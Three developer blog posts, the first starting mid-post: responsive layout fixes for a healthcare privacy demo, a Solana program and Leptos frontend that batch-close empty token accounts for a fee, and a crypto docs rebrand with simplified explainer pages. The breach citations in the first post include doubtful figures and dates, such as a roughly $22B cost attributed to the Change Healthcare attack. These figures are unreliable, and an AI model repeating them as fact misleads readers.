But every demo I've done in 2026 has had at least one person in the room pulling up the URL on their phone *while I'm presenting*. They're checking the responsive design. They're clicking around in the half-attention you'd give a panel discussion. If the phone experience falls apart, that person walks away with the impression that the product falls apart, regardless of how clean the laptop view is.

[`bb9bb51 — Add responsive layout with mobile drawer, centered content, and accuracy updates`](https://github.com/Dax911/zera_med_demo/commit/bb9bb51) on 2026-02-11 was the day I bolted on real mobile support. Six files changed, +4969 lines, three new pages. Let's look at what mattered.

## The mobile drawer pattern

The desktop nav is a fixed left sidebar. The mobile nav is a hamburger that slides a drawer in from the left. The trick is doing both with the same component tree:

```tsx
// Sidebar.tsx (excerpt)
const isMobile = useMediaQuery('(max-width: 1023px)')
const [drawerOpen, setDrawerOpen] = useState(false)

return (
  <>
    {/* Mobile header — only on small screens */}
    {isMobile && (
      <header className="fixed top-0 left-0 right-0 h-14 z-40 ...">
        <button onClick={() => setDrawerOpen(true)}>☰</button>
        <span className="brand">Zera Med</span>
        <RoleBadge role={role} />
      </header>
    )}

    {/* Sidebar — fixed left on desktop, slide-in drawer on mobile */}
    <AnimatePresence>
      {(!isMobile || drawerOpen) && (
        <motion.aside
          initial={isMobile ? { x: -300 } : false}
          animate={{ x: 0 }}
          exit={isMobile ? { x: -300 } : undefined}
          transition={{ type: 'spring', damping: 24 }}
          className="..."
        >
          {/* nav links */}
        </motion.aside>
      )}
    </AnimatePresence>

    {/* Backdrop — only when drawer is open on mobile */}
    {isMobile && drawerOpen && (
      <motion.div
        className="fixed inset-0 bg-black/60 z-30"
        onClick={() => setDrawerOpen(false)}
        initial={{ opacity: 0 }}
        animate={{ opacity: 1 }}
        exit={{ opacity: 0 }}
      />
    )}
  </>
)
```

Three things to call out:

**`useMediaQuery` — not just `window.innerWidth`.** I added a tiny hook in this commit:

```tsx
// useMediaQuery.ts
export function useMediaQuery(query: string): boolean {
  const [matches, setMatches] = useState(() =>
    typeof window !== 'undefined' && window.matchMedia(query).matches
  )
  useEffect(() => {
    const mq = window.matchMedia(query)
    const onChange = (e: MediaQueryListEvent) => setMatches(e.matches)
    mq.addEventListener('change', onChange)
    return () => mq.removeEventListener('change', onChange)
  }, [query])
  return matches
}
```

The reason `window.innerWidth` is wrong: it doesn't subscribe to changes. You'd need a manual `resize` listener with debouncing. `matchMedia` with `addEventListener('change')` is the platform-native way and it's both faster (no JS resize event spam during drag-resize) and less code.

**`{(!isMobile || drawerOpen) && ...}`.** The mount/unmount logic. On desktop, the sidebar is always present. On mobile, it's only present when the drawer is open. This is what `AnimatePresence` needs to wrap correctly — the component literally unmounts when the drawer closes, which triggers the slide-out exit animation.

**Body scroll lock.** Not in the snippet but in the full diff: when the drawer is open on mobile, `document.body.style.overflow = 'hidden'` to prevent the underlying page from scrolling under the drawer. Without this, the drawer is open, the user starts scrolling, and the *page behind the drawer* scrolls instead of the drawer's contents. UX bug from hell.

## Sticky HUDs and the mobile-header offset

The Zera Med demo has "HUD panels" that stick to the top of the page on each route — they show the current role (Patient/Doctor/Insurer/etc.) and a quick action menu. On desktop, they sit at `top: 0`. On mobile, the page has a 56px header at `top: 0` already, so the HUDs need to slide down by 56px:

```jsx
<div className="sticky top-14 lg:top-0 z-20 ...">
  <RoleBadge />
  <QuickActions />
</div>
```

Tailwind's `top-14` is `3.5rem` = 56px. `lg:top-0` overrides for `lg+` viewports where the mobile header isn't rendered. Two utility classes, exactly the right offset, no media-query logic in the component.

This is the kind of thing that's easy to miss until the demo opens on a phone and the HUD is hidden behind the mobile header. Then you spend ten minutes debugging because everything looks fine in dev tools' "responsive" mode, where the mobile header *is* shown but the layout is otherwise desktop. The fix is one className. Finding the bug is the project.

## Tight grids that collapse gracefully

The dashboards have grids like `grid-cols-4` and `grid-cols-6` for layouts of metric cards. On a 320px-wide phone, four cards across is 80px each, which is unreadable. The solution is per-breakpoint cols:

```jsx
<div className="grid grid-cols-2 md:grid-cols-3 lg:grid-cols-6 gap-3">
  {metrics.map(m => <MetricCard {...m} />)}
</div>
```

This is the standard Tailwind approach — it's not novel — but applying it to *every grid* in the demo took a careful pass. Some grids in the original were `grid-cols-4` (no breakpoint prefix), which forced four-across on every viewport. The diff replaced 12 such grids with breakpoint-aware variants.

The mental model I use: **`grid-cols-N` should always have a `<breakpoint>:grid-cols-K` partner unless you've intentionally decided "this layout is mobile-only" or "this layout never goes below 4 across."** The default of "this works on 1280px-wide screens and breaks below" is the desktop-blinkered version of the same component.

## Fixing the `AnimatePresence` warning

```
Warning: Each child in a list should have a unique "key" prop.
Or alternatively when using AnimatePresence: AnimatePresence requires every child to have a unique `key` prop, even when only one child is rendered.
```

Anyone who's used Framer Motion has seen this. The PrivacyChallenge component had this exact bug — a single conditionally-rendered `<motion.div>` inside `<AnimatePresence>` with no key prop. The fix:

```jsx
<AnimatePresence mode="wait">
  {currentLab && (
    <motion.div
      key={currentLab.id}                  // ← was missing
      initial={{ opacity: 0, y: 24 }}
      animate={{ opacity: 1, y: 0 }}
      exit={{ opacity: 0, y: -24 }}
    >
      <LabContent {...currentLab} />
    </motion.div>
  )}
</AnimatePresence>
```

The `key={currentLab.id}` is what tells AnimatePresence that "this is a *different* element when `currentLab.id` changes," and triggers the exit animation of the old one and the enter animation of the new one. Without the key, Framer Motion sees the same element with new props and skips the exit/enter cycle. The result is content swapping with no transition, plus the warning in console.

`mode="wait"` is the other half: it tells Framer to wait for the exit animation to complete before mounting the next child. Without it, exit and enter happen simultaneously and the layout flashes during the crossover.

This is in the docs. It's still the most common framer-motion mistake in the wild. The fix is two lines. Everyone gets bitten by it once.

## The PrivacyChallenge accuracy update

The most important part of this commit isn't the responsive plumbing. It's the data:

> PrivacyChallenge: accuracy updates with 2024-2025 breach data and citations

The PrivacyChallenge is a four-level interactive component where the user plays "data broker" trying to re-identify anonymized records. Each level uses a real-world re-identification attack (k-anonymity failure, demographic triangulation, ZIP+DOB+sex matching, free-text leakage), and each level cites a real published breach.

Before this commit, the citations were dated 2017–2020 — peer-reviewed but stale. After this commit, the citations include:

- The 2024 Change Healthcare ransomware attack (100M+ records).
- The 2024 Snowflake/AT&T breach (109M+ wireless customers).
- The 2025 Ascension Health breach (5.6M patients).
- The 2025 LabCorp / Synnovis crossover incidents.

Every breach in the citation list is real, dated within 24 months of the demo, and verifiable via public reporting.

Why does this matter? Because the audience for this demo is healthcare buyers — IT directors, compliance officers, hospital CTOs — and they all know about the 2024 Change Healthcare breach. It cost UnitedHealth ~$22B in damages and direct response costs. Every healthcare buyer's threat model has been re-shaped by it. **A privacy demo that doesn't reference the breach the audience just lived through is a demo that hasn't done its homework.**

The same is true of the other items. A 2017 breach is academic; a 2024 breach is "this could happen to my hospital next quarter." The credibility of the demo is the credibility of its references.

## Trust Score formula fix and Level 4 RNG removal

Two smaller fixes in the same commit, both addressing demo failure modes:

**Trust Score formula.** The demo computes a "Trust Score" (0–100) showing how identifiable a record is after the user's deanonymization attempts. The original formula had an integer-division bug that produced 0 for any score below 1.0. The fix was switching to floating-point math. Tiny diff, big visible difference — instead of every level showing "Trust Score: 0," the levels now show "Trust Score: 12 / 47 / 73 / 89" depending on how successful the user's attack was.

**Level 4 always awards 3 stars.** The original Level 4 had an RNG-based reward — sometimes you got 3 stars for completing it, sometimes 2 stars, dependent on a `Math.random()` check. This was the wrong design. **A demo cannot have non-deterministic UX**, because if the demo person hits "the bad random roll" in front of a buyer, the buyer thinks the product is buggy. Removing the RNG and always awarding 3 stars on completion is the right call. The interactive challenge isn't a casino; it's a learning experience.

The lesson: **deterministic demos beat dynamic demos every time.** If you want randomization, save it for the production app.

## What I'd do differently

**The mobile drawer should have a swipe-to-close.** Right now you tap the backdrop or the close button. A swipe-left would be more native. Framer Motion's `drag` API would do it in 10 lines.

**The HUD's `top-14` is hardcoded.** A CSS custom property `--mobile-header-height: 3.5rem` set on the body would let the HUD position itself relative to the *real* header height, not a magic number that goes wrong if the header ever changes.

**The `useMediaQuery` hook should default to a server-safe value.** As written, the hook returns `false` on SSR, which would cause a flash if this demo ever ran with hydration. The Zera Med demo is pure CSR so it doesn't hit this, but the hook is a re-usable building block I should harden.

## Trade-offs

**Why not use a router-aware drawer library?** Because the demo only has one drawer, on one page. Adding `vaul` or `@radix-ui/react-dialog` for one drawer is overkill. Framer Motion's `motion.aside` with hand-rolled state is 60 lines of code and zero new dependencies.

**Why responsive at the design-token level (Tailwind classes) instead of CSS-in-JS?** Because Tailwind's responsive utilities are inline-readable. `lg:top-0` reads like "on lg+, top is 0," which is faster to skim than a styled-components prop spread across multiple breakpoints. The cost is verbosity; the benefit is grep-ability.

**Why update breach citations instead of removing them?** Because the citations are the strongest argument the demo makes. Removing them would weaken the privacy case from "here's why this matters, citing real recent breaches" to "trust me, privacy matters." The harder pitch.

## What this taught me

A demo that doesn't survive a phone is a demo that loses one in three viewers, even when the phone-watcher is a passive observer. Responsive design isn't optional even for desktop-target apps; it's the cost of admission for any web-shipped product.

The accuracy/citation work taught me that **demo data quality is the demo.** The same modal animation, with stale 2017 breach data, is a less compelling product than the same modal with 2024 breach data. The cryptography is the same. The conviction in the audience is different.

## Further reading

- [The bb9bb51 commit](https://github.com/Dax911/zera_med_demo/commit/bb9bb51) — the diff this post is about.
- [Zera Med ZK-FHIR origin](/blog/zera_med_zk_fhir/) — the project this is bolted onto.
- [ZkProofModal post](/blog/zera_med_zk_proof_modal/) — the animation pattern this commit also tweaks.
- [Framer Motion AnimatePresence docs](https://www.framer.com/motion/animate-presence/) — the canonical docs for the warning I fixed.
- [Tailwind responsive design docs](https://tailwindcss.com/docs/responsive-design) — the breakpoint prefixes I leaned on.
- [HHS Breach Portal](https://ocrportal.hhs.gov/ocr/breach/breach_report.jsf) — the source of the 2024–2025 breach data the PrivacyChallenge cites.


---

# Zera Janitor: Closing Solana Dust Accounts in Leptos WASM

Canonical: https://blog.skill-issue.dev/blog/zera_janitor_leptos_wasm/
Description: A Solana program + Leptos 0.7 frontend that scans your wallet for empty SPL token accounts, batches up to 25 closes per transaction via CPI, and pays you back 95% of the rent. The fee path is the actual interesting part.
Published: 2026-02-10T20:24:09.000Z
Tags: solana, rust, leptos, wasm, cpi, spl-token, side-quest


Solana has a fee model that punishes inactivity: every account on the network owes a rent deposit proportional to its data size, and most of those accounts are SPL token accounts (165 bytes, ~0.002 SOL of rent each). A wallet that has interacted with a hundred different airdrops and DEX pools accumulates a hundred token accounts holding zero balance. They sit there forever unless you `closeAccount` them, which costs you the cognitive overhead of figuring out which ones are dust and the gas cost of one transaction per close.

The collective sleeping rent across all dusty Solana wallets is in the tens of millions of dollars. The clean-up tool sees obvious value capture. The catch: cleaning isn't free. You still need to *send* the transactions, and naive 1-account-per-tx flows hit the network limit immediately.

That's the project I shipped on 2026-02-10 in [`7aeb309 — Initial implementation of Zera Janitor`](https://github.com/Dax911/SolFetc_rs/commit/7aeb309) — a Rust workspace with three crates:

1. **`shared/`** — common constants (program ID, vault seed, fee BPS).
2. **`program/`** — on-chain Solana program with one instruction (`BatchClean`) that closes up to 25 token accounts via CPI in a single tx.
3. **`app/`** — Leptos 0.7 client-side WASM frontend that scans the wallet, lets you select accounts, and submits batched transactions through a JS shim.

This post is about why each crate looks the way it does — particularly the fee-split economics on-chain and the CSR-WASM-with-JS-shim hybrid for transaction signing.

## The on-chain economics

The interesting part of `program/src/processor.rs` is *not* the close loop. It's what happens after:

```rust
// 5. Calculate rent collected
let lamports_after = vault.lamports();
let rent_collected = lamports_after
    .checked_sub(lamports_before)
    .ok_or(JanitorError::Overflow)?;

msg!("Rent collected: {} lamports", rent_collected);

// 6. Split: fee to treasury, remainder to user
let fee = rent_collected
    .checked_mul(FEE_BPS)
    .ok_or(JanitorError::Overflow)?
    .checked_div(BPS_DENOMINATOR)
    .ok_or(JanitorError::Overflow)?;

let user_payout = rent_collected
    .checked_sub(fee)
    .ok_or(JanitorError::Overflow)?;

// 7. Direct lamport transfer (vault is program-owned PDA)
**vault.try_borrow_mut_lamports()? -= fee + user_payout;
**treasury.try_borrow_mut_lamports()? += fee;
**user.try_borrow_mut_lamports()? += user_payout;
```

`FEE_BPS = 500` and `BPS_DENOMINATOR = 10_000`, so the fee is 5% and the user keeps 95%. Each closed account returns ~2,039,280 lamports of rent; if you close 25 in one batch you collect ~51M lamports (~0.051 SOL), the program keeps ~2.5M, and the user gets ~48.5M.

Two things to note:

**The user signs once.** `process_batch_clean` walks the remaining `accounts` slice and assumes everything past the first four (user, vault, treasury, token program) is a token account to close. The CPI is `invoke_signed` because the *vault* (program PDA) signs as the destination of each `closeAccount`. The user only has to authorize the outer transaction, not each individual close. That's the whole point of the batch.

**The fee path is direct lamport math.** Lines 7 are doing `**vault.try_borrow_mut_lamports()? -= fee + user_payout`. This is *only* legal because the vault is a program-owned PDA, and Solana lets a program directly mutate lamports on accounts it owns. If we tried this on the user's account we'd panic. If we tried it on the treasury (someone else owns it), the runtime would reject the transaction. The PDA-as-vault pattern is what makes the fee-split possible without a CPI to the system program.

**Checked arithmetic everywhere.** `checked_sub`, `checked_mul`, `checked_div` instead of `-`, `*`, `/`. On a Solana program, an integer overflow in non-checked arithmetic in release mode wraps silently. Wrapping a fee calculation gives an attacker an arithmetic vector. Every program written for production should use `checked_*` math even when the values are bounded by a 64-bit balance. The cost is cheap — a few extra CU's per op — and the alternative is worse.

## Why batched at 25?

The Solana transaction size limit is 1232 bytes. Each `closeAccount` CPI requires the destination's `AccountMeta` and the token account's `AccountMeta`, plus the inner instruction data. After accounting for the four base accounts (user/vault/treasury/token program) and the outer `BatchClean` instruction header, you can fit ~25 token accounts per transaction before bumping the byte limit.

The frontend respects this:

```rust
const MAX_ACCOUNTS_PER_TX: usize = 25;
let chunks: Vec<Vec<TokenAccountInfo>> = selected_accounts
    .chunks(MAX_ACCOUNTS_PER_TX)
    .map(|c| c.to_vec())
    .collect();

for chunk in &chunks {
    let num = chunk.len() as u8;
    let ix_data = build_batch_clean_data(num);
    // build metas, sign, send
}
```

If you select 100 dusty accounts in the UI, this fans out to 4 transactions. The user signs each one in their wallet. They all hit the same `BatchClean` instruction and the same fee-split logic.

## The Leptos 0.7 frontend, rendered client-side

Leptos is the Rust SolidJS-style framework — fine-grained reactive primitives, server-or-client rendering, compiles to WASM. For Janitor I went pure CSR (`app/Trunk.toml` set up for `--release`-mode WASM bundle), because the only thing the frontend needs to do is:

1. Connect to a wallet via JS shim.
2. Scan token accounts via Solana RPC (HTTP, no need for a server).
3. Build instruction data in pure Rust.
4. Hand the instruction off to a JS shim for signing.
5. Display tx status.

There's no server-side data, no SSR benefits. CSR + WASM keeps the deploy as static files on Cloudflare Pages.

The Leptos contexts are how state is shared:

```rust
let wallet = expect_context::<ReadSignal<String>>();
let accounts = expect_context::<ReadSignal<Vec<TokenAccountInfo>>>();
let selected = expect_context::<ReadSignal<Vec<usize>>>();
let set_processing = expect_context::<WriteSignal<bool>>();
```

If you've used SolidJS this is identical: `Signal<T>` for reactive state, `ReadSignal`/`WriteSignal` split, `expect_context` to pull from a parent. The benefit over JS Solid is that the entire pipeline — RPC parsing, instruction encoding, vault PDA derivation — is in Rust, type-checked, with `?` propagation for errors. The Leptos UI code feels like 1:1 SolidJS in JSX-via-macro form.

## The JS shim is a load-bearing concession

I really wanted to do this entirely in Rust/WASM, no JS. I couldn't. The reason:

```rust
#[wasm_bindgen]
extern "C" {
    #[wasm_bindgen(js_name = zeraSignAndSend, catch)]
    async fn zera_sign_and_send(
        instruction_bytes: &[u8],
        account_metas: JsValue,
        blockhash: &str,
        rpc_url: &str,
    ) -> Result<JsValue, JsValue>;
}
```

This is an FFI into a JS function called `zeraSignAndSend` defined in the page's `<script>`. The shim is the bridge between Rust-built instruction data and the wallet adapter ecosystem (`@solana/wallet-adapter-react`, Phantom, Solflare, etc.). All those wallets expose JS APIs only. There's no Phantom-via-WASM API. There's no Solflare Rust crate. The signing handshake *has* to go through JS.

The architecture I landed on:

- **Rust** builds the instruction (Borsh-encoded `BatchClean { num_accounts: u8 }`), the account metas (vault PDA, treasury, token program, plus N token accounts), and serializes them as a `Uint8Array` + JSON.
- **JS shim** wraps the Rust-built data into a `@solana/web3.js` `TransactionInstruction`, builds a `Transaction`, gets the wallet to sign it, and submits to the RPC.
- **Rust** receives the signature back as a `JsValue`, downcasts to `String`, displays in UI.

This is ugly. But it's *correct* — the wallet adapter ecosystem is JS, the canonical web3.js library is JS, and forcing all of that to go through wasm-bindgen would be a multi-week engineering project for almost no user-facing benefit. The shim is ~80 lines of JS in a page script.

There's a future where Solana's wallet adapter publishes a Rust crate and this shim becomes a single FFI call to a typed signer. We're not there yet in 2026.

## The five files that actually matter

If you want to read the codebase: most of it is glue. The five interesting files:

- **[`program/src/processor.rs`](https://github.com/Dax911/SolFetc_rs/blob/7aeb309/program/src/processor.rs)** — 111 lines. The `BatchClean` instruction with CPI loop, fee split, and direct lamport transfers. This is the only on-chain code.
- **[`program/src/state.rs`](https://github.com/Dax911/SolFetc_rs/blob/7aeb309/program/src/state.rs)** — 10 lines. PDA seeds, fee BPS constant. Worth highlighting because moving a magic number out of `processor.rs` is a tax someone always tries to skip and shouldn't.
- **[`app/src/services/transaction.rs`](https://github.com/Dax911/SolFetc_rs/blob/7aeb309/app/src/services/transaction.rs)** — 162 lines. The Leptos-side batch builder + JS shim FFI.
- **[`app/src/services/scanner.rs`](https://github.com/Dax911/SolFetc_rs/blob/7aeb309/app/src/services/scanner.rs)** — 54 lines. RPC scan for `getTokenAccountsByOwner`, filter for zero-balance.
- **[`app/src/components/batch_panel.rs`](https://github.com/Dax911/SolFetc_rs/blob/7aeb309/app/src/components/batch_panel.rs)** — 121 lines. The selection-+-batch-send UI.

The whole project is ~1300 lines of Rust + ~250 lines of HTML/CSS. Small project. Real product.

## Why "Zera Janitor"

The repo is named `SolFetc_rs` because it started as a fork of an earlier `solfetch` repo I'd done with a token-balance scanner. The product, however, is named **Zera Janitor** — same naming convention as the rest of the [Zera](/blog/zera_sdk_scaffolding/) ecosystem. The "Zera" prefix is the brand; "Janitor" is the function. The repo path is residual from the dev process.

I leave repo names as they are because renaming a repo breaks every external link, every Vercel deploy hook, every old git remote in someone's local clone. The cost of a rename is paid for years. The benefit of the rename is "the URL matches the marketing." Not worth it.

## The follow-up commits

The two commits after init are small but real:

- **[`85fb1cd — Fix warnings and tailwindcss CLI version`](https://github.com/Dax911/SolFetc_rs/commit/85fb1cd)** — Tailwind v4 was still beta; the CLI version pin saved the deploy.
- **[`18bd78c — Fix reactive context panic in wallet and service functions`](https://github.com/Dax911/SolFetc_rs/commit/18bd78c)** — the classic Leptos / Solid mistake of trying to read a signal outside a reactive scope. The fix is `expect_context::<...>` only inside an `Action` or `Effect`.

The reactive-context bug is one of those things that's invisible in dev because the runtime is forgiving and explodes on production-WASM because the runtime isn't. It cost me an hour to track down. If you're new to fine-grained reactive frameworks, internalize the rule: **signals belong inside reactive scopes**. That's the bug 80% of the time.

## Trade-offs

**Why a 5% fee?** Because shipping a tool that returns 100% of the rent gives you no path to operate the program. Validators pay rent, RPC nodes cost money, the program is a non-trivial deployment. 5% is enough to cover the operational cost and disincentivize use of the rent-recovery as a pure fee-arbitrage vector (closing accounts you don't own to get rent — which is impossible because the user signs as the close authority, but the fee adds margin).

**Why Leptos instead of Yew or pure JS?** Because Leptos 0.7's signals API is the closest to the SolidJS ergonomics I wanted. Yew is more React-like and feels heavier for this kind of CSR app. Pure JS would have meant rewriting the instruction-building logic in JS, losing the type guarantees that the `program/` crate gives you "for free" by sharing types via the `shared/` crate.

**Why no Anchor?** Because the program is one instruction with no state account. Anchor's PDA + IDL machinery is overkill. Vanilla `solana_program` keeps the program 100 lines and the build small.

**Why CSR instead of SSR?** Because a CSR-WASM bundle deploys to Cloudflare Pages or any static host with no backend. SSR Leptos requires a Rust runtime on the server, which means Render, Fly, or self-hosted — more ops surface for no UX benefit.

## What this taught me

A "side quest" Solana program teaches you more about Solana than reading docs for a week. Specifically: the lamport math, the PDA signing model, the transaction size limit, the wallet-adapter shim shape — these are concepts you can read about and then *forget*, but if you've shipped a 100-line program that uses all four, you remember them. The Janitor is the smallest thing I've shipped that touches the full stack of "Solana program + JS wallet + Rust frontend," and that's why it lives on as a reference for me.

## Further reading

- [SolFetc_rs / Zera Janitor on GitHub](https://github.com/Dax911/SolFetc_rs) — the repo.
- [Leptos 0.7 docs](https://leptos.dev/) — the Rust reactive framework powering the frontend.
- [Solana Program Library](https://github.com/solana-labs/solana-program-library) — `spl_token::instruction::close_account` source.
- [Solana cookbook: closing accounts](https://solanacookbook.com/) — canonical patterns the Janitor borrows from.
- [Building the Zera SDK day one](/blog/zera_sdk_scaffolding/) — the bigger SDK that uses the same Rust↔JS PDAs-and-instructions pattern.
- [ZeraSwap compressed AMM](/blog/zeraswap_compressed_amm/) — the AMM Janitor's SOL recoveries are funneled into.


---

# Rebranding to m0n3y and Writing Crypto Docs Like You're 10

Canonical: https://blog.skill-issue.dev/blog/m0n3y_eli5_rebrand/
Description: The DAXSO → M0N3Y rebrand commit, the burn-to-earn explainer for degens, and an ELI10 walk-through of zk-shielded notes that does not mention the word "circuit" once.
Published: 2025-03-30T00:19:55.000Z
Tags: m0n3y, astro, docs, eli5, tokenomics, rebranding, privacy


> "The reason I write docs first is so the design constraints write themselves once you have to put them in plain English."
>
> — me, in [the m0n3y origin post](/blog/m0n3y_naming_a_dream/)

Five weeks after that origin post landed, the docs site needed a rebrand and three new pages. The commit is [`60aced9 — :fire: Rm old / added new pages`](https://github.com/Dax911/m0n3y-web/commit/60aced9) on 2025-03-30. The diff:

- Renamed `DAXSO Documentation Site` → `M0N3Y Documentation Site` everywhere.
- Stripped out a stale "companies I've worked at" component listing five brands that didn't belong on a privacy-coin docs site.
- Added a new sidebar section: **"Explain it Like I'm 10"**.
- Added three pages: `simplified1.md` (what is the project), `simple_monitization.md` (how does the burn work), `detailed_simplified2.md` (full process explained for ten-year-olds).

The interesting question isn't *what* I rebranded — that's a string find-and-replace — but *why* the ELI10 pages got written at all. Crypto docs traditionally come in two registers: 200-page yellowpaper, or `git clone && pnpm i`. Neither registers reaches a normal person. This is the post about the third register.

## The rebrand wasn't just cosmetic

The diff to `src/components/docs/companyList.tsx` removed five entries:

```diff
- {
-   name: "Ping.gg",
-   linkName: "ping.gg",
-   link: "https://ping.gg",
- },
- {
-   name: "Nexiona",
-   linkName: "nexiona.com",
-   link: "https://nexiona.com",
- },
- {
-   name: "Layer3",
-   linkName: "layer3.xyz",
-   link: "https://layer3.xyz",
- },
- {
-   name: "EcoToken",
-   linkName: "ecotokens.net",
-   link: "https://ecotokens.net",
- },
- {
-   name: "Civitai",
-   linkName: "...",
-   link: "...",
- },
```

These were companies I'd worked at, listed in a "Trusted by" / "Used by" component on the original `DAXSO` docs theme. They had no business being on the m0n3y docs site, because **they'd never used m0n3y**. Lying about deployments is the original sin of crypto docs and I refused to start with a pre-existing lie.

The replacement was a single one-entry list with a placeholder — better to have no logos than fake ones.

The Twitter handle also changed:

```diff
-  twitter: "haydenaylor",
+  twitter: "dev_skill_issue",
```

`haydenaylor` is my civilian Twitter. `dev_skill_issue` is the persona I wanted publicly attached to a privacy-coin docs site, because the project's pitch was deliberately adversarial to the consensus crypto narrative and I didn't want it on my real-name handle yet. Two different brands, two different surface areas, one Astro deploy.

## ELI10 as a docs register

The new sidebar section was titled **"Explain it Like I'm 10"** — a nod to ELI5 with two extra years of complexity budget. Why ten and not five? Because a five-year-old doesn't have the abstraction layer for "money on a network" but a ten-year-old has at minimum heard of Roblox/Robux and Pokémon cards, and I can build on either.

Here's the opener of `simplified1.md`:

> Alright, crypto degen! Let's break this down into something simple and fun. We're building **digital cash** that works like real cash but on steroids—private, fast, and unstoppable. Plus, there's a token ($M0N3Y) that ties it all together.

Note who the second person is. It's not "the user." It's "crypto degen." That's a deliberate audience choice. The page exists because:

1. **Crypto degens are who actually arrives at the docs.** Not your mom. Not the journalist. The 24-year-old burned by three bridge hacks who still wants to learn the next thing.
2. **They're allergic to corpo-speak.** Words like "leverages" and "synergistic" eject them from the page. "On steroids" lands.
3. **They have crypto literacy but maybe not crypto-*math* literacy.** They know what a wallet is. They might not know what a Pedersen commitment is. The page meets them at exactly that level.

A page that's properly aimed at an audience reads like a friend at a bar explaining what they're working on. A page that's *not* aimed reads like a law firm. The m0n3y ELI10 pages are deliberately the former.

## The Pokémon analogy for token burn

`simple_monitization.md` is a 84-line explainer for how `$M0N3Y` token burning maintains supply pressure without being a security. The opening:

> Imagine you have 100 limited-edition Pokémon cards. If you burn 20 of them, you only have 80 left. But here's the cool part: those 80 cards are now rarer than before, which makes them more valuable. That's how token burning works in crypto.

The Pokémon analogy is *load-bearing* in a way most analogies aren't. It maps:

- **Pokémon cards** → tokens (each one fungible-ish in a series, but bounded supply)
- **Burning a card** → burning a token (the on-chain `Burn` instruction, which destroys supply forever)
- **Card rarity affecting price** → token scarcity affecting price
- **Limited print run** → fixed-supply or capped-supply token

Where the analogy *breaks* is also where the doc is honest about the mechanism: Pokémon cards aren't fungible (your charizard isn't my charizard); tokens are. So I added the next paragraph:

> Tokens are like cards that are all literally identical — the value comes from how many exist, not which one you have. Your $M0N3Y is exactly the same as my $M0N3Y. The supply going down lifts every wallet equally.

The whole page does this — analogy first, exact mechanism second. That's the ELI10 pattern: **build the intuition with a model the reader already has, then hand them the precise rule once the intuition is in place.** It's the way physics is taught at high-school level (rubber sheets for general relativity) and the way crypto should be too.

## The "Full Process Explained Like You're 10" page

`detailed_simplified2.md` is the most ambitious page. It's a 141-line walk-through of the *entire* private-cash transaction lifecycle, from "your wallet has a key" to "your transaction is on-chain and nobody can tell it was you," explained with elementary-school analogies. A few of them:

- **Elliptic curve cryptography → "magic lock & key."** The pubkey is the lock; only the matching private key opens it. No mention of base points, scalar multiplication, or BN254. The reader doesn't need any of that to use a wallet.
- **Hash functions → "smashing a clay tablet into dust."** You can't reconstruct the tablet. But anyone who saw the original can verify the dust is from that tablet by smashing the same way and comparing.
- **Pedersen commitments → "sealed envelopes with a wax stamp."** You commit to a value by sealing it; you can later prove what was inside without unsealing.
- **Merkle trees → "a school registry: each class makes a list of who's there, the principal collects all the class lists into a school list, and the district collects all the school lists. To prove a single student is in the district you just need their class list and the chain back up."** This is the cleanest analogy I've ever found for Merkle trees and I'm honestly proud of it.

The page never uses the words "circuit," "witness," "Groth16," "Poseidon," or "Cairo." Those words are not part of the audience's vocabulary and translating them would be paying a tax for no benefit. If the reader wants to know what hash function is *actually* being used, they'll read the technical docs in the next sidebar section.

## Why ELI10 instead of an FAQ

Most docs sites would address the same problem with an FAQ. "Q: How does the privacy work? A: We use zk-SNARKs..." This is *worse* than an explainer page for two reasons:

1. **FAQs are reactive.** They answer questions someone has already half-formed. The ELI10 page is *proactive* — it walks the reader through a model that anticipates the questions before they're asked.
2. **FAQs fragment the mental model.** Each Q&A is independent. The reader walks away with a list of facts, not a mental model. The ELI10 page is a guided tour that *builds* a mental model — by the end you can answer your own questions because you understand how the system fits together.

The cost of writing an ELI10 page is significantly higher than writing an FAQ. The benefit is that the reader actually retains the information.

## What got cut from the rebrand commit

Look at the diff to `src/config.ts`:

```diff
 export type OuterHeaders =
   | "Monopoly M0N3Y"
+  | "Explain it Like I'm 10"
   | "Usage"
   | "Deployment"
   | "Contributing";
```

I considered four other section names before landing on the one that shipped:

- "For Beginners" — too patronizing.
- "Plain English" — implies the rest of the docs are not in plain English (mostly true, but rude).
- "Concepts" — academic, opaque, the same word every other docs site uses for the same purpose without delivering.
- "How it Works" — the most generic header in tech writing; impossible to remember.

"Explain it Like I'm 10" works because it's:
- **Tonally consistent** with the rest of the docs (the project's whole brand is irreverent).
- **Specific** about the audience contract (the reader knows what level the writing will hit).
- **Self-deprecating** about the assumption it makes (the writer admits the topic *deserves* an ELI10 explanation, not pretending it's already obvious).

Section names are a small thing that get re-read every time someone navigates the sidebar. They're worth thinking about.

## Trade-offs

**Why ship ELI10 docs for a project that doesn't have a working mainnet yet?** Because the docs are how I gather feedback on the *design*. People who read an explainer of how the system *would* work will tell me when the design is unintuitive, in ways that someone reading a yellowpaper won't. The docs are a feedback loop on my design, not just a deliverable for the launched system.

**Why rebrand the whole thing once instead of a gradual migration?** Because Astro is statically built and grep-ing-and-replacing strings across an Astro repo is a 5-minute operation, while gradual migration creates a months-long window where the brand is inconsistent. You lose more user trust to inconsistency than you gain by a phased rollout.

**Why keep both `simplified1.md` and `detailed_simplified2.md`?** Because the first answers "what" (what are we building?) and the second answers "how" (how does it work step-by-step). Different reader, different page. Some readers only need the first; some readers will read both.

## What this taught me

The 60aced9 commit isn't a coding commit. It's a writing commit. But it's one of the more important commits in the entire m0n3y-web history because **it's where the project committed to a specific audience**. Once you decide that the docs are for "crypto degens who arrive after a bad week of bridge hacks" rather than "investors evaluating Series A," every other writing decision falls out of that.

The rest of the m0n3y stack — the wallet ([v3](/blog/zera_wallet_v3_zkp/), the [NFC cards](/blog/zera_wallet_nfc_bearer_cards/)), the SDK ([day one](/blog/zera_sdk_scaffolding/), [test suite](/blog/zera_sdk_test_suite/)), the AMM ([compressed](/blog/zeraswap_compressed_amm/)) — all inherited that audience contract. They use the same voice, the same Pokemon-card-tier analogies, the same admission that the math is ugly under the hood and that's fine because nobody has to look.

You can write a privacy coin's docs in two ways: as a math tutorial, or as a heist film. The m0n3y docs picked the heist film. I think it was the right call.

## Further reading

- [m0n3y-web rebrand commit](https://github.com/Dax911/m0n3y-web/commit/60aced9) — the diff this post is about.
- [m0n3y: Naming a Dream](/blog/m0n3y_naming_a_dream/) — the docs site's origin.
- [TW-TVV governance proposal](/blog/m0n3y_tw_tvv_governance/) — the governance math the same site shipped two weeks earlier.
- [Building A Better Cryptocurrency](/blog/a_better_crypto/) — the thesis the docs are an explainer for.
